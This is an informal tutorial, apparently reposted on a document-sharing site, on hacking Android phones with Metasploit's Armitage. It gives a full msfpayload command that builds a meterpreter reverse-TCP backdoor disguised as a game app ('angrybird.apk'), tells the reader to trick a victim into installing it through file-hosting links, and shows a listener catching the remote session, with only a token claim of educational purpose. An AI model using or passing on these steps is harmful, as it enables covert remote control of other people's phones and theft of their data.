how to hack your android using armitage

Upload: fery-ardiansyah

Post on 09-Mar-2016

14 views

Category:

Documents


0 download

DESCRIPTION

dgs

TRANSCRIPT

how to hack your android usingarmitageHello, thanks for give me support to like my facebook fan page athere,now i want to share, how to Hack your Android device using Armitage? you know Armitage is Metasploit Version Graphic User Interface or GUI, ok lets rock:Dwhat we need??1. msfpayload to create backdoor2. Armitage3. Kali Linux or another Pentest Distro4. Social Engineering :p the first you need to create backdoor.apk bro, open terminal and put this code1root@kali :~#msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=81 R > angrybird.apk

NOTE : 192.168.1.3 is my IP as Attacker, 81 is port listener and angrybird.apk is the backdoor name, whatever, use your mind to give the backdoor name What next? you just need to send the backdoor on your Android Target bro, you can upload on 4shared or Cloud computing like a dropbox Open the armitage, look at this image

After the Armitage is opened, you just to clickPayload > Android > Meterpreter > reverse_tcp

Next, please insert your IP and Port to listening the meterpreter,remember The PORT must be same with your backdoor in the first step, Click Launch

Listener is ready to get meterpreter, just need theVictiminstallmy angrybird.apkhahaha

Android Device haveinstalled my backdoor so Meterpreter session 1 opened:D

Up to you, what do you want to do,but this tutorial just for education purpose

Dedicated tohttp://www.indonesianbacktrack.or.id| BlackNewbieTeam | idblackhat | my love Nabila